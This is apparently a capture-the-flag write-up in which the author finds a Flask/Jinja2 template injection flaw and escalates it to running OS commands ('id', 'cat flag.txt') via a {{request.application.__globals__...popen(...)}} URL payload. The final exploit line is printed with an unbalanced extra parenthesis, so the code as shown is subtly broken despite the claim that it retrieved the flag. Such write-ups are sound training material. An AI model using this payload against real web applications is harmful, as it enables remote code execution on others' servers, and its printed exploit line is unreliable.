Challenge Description
1
Can you exploit this simple mistake?
SOLUTION
Click on the Start Instance
button to start the challenge.
Then you are provided with an web address
in the form of <ip>:<port>
. Copy it and open it in another tab or browser. In my case it was http://46.101.92.17:31311
Homepage of the Webapp :
The webapp shows a message Site still under construction
Proudly powered by Flask/Jinja2
Here we can see that it says that it is made with Flask/Jinja2
.
Searching exploits for Flask/Jinja2
:
I have started searching exploits for Flask/Jinja2
. Then I came across
Here it says about the SSTI exploit.
Test Exploit :
After modifying the provided url to http://46.101.92.17:31311/{{41+41}}
I have noticed that the returned result evaluates the value.
Then I came across:
Creating the exploit:
I have manipulated
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
step by step.
EXPLOIT Code:
1
http://46.101.92.17:31311/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt')).read()}}
Format:
1
http://<Web app address>/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt')).read()}}
This is how I got the flag.
Just replace <Web app address>
with the web address that you are provided. In my case it was http://46.101.92.17:31311
This is how, I solved this challenge.
Thankyou, for reading my writeup :)
Hope, I would see you in my next writeup.
Support Me if you want to.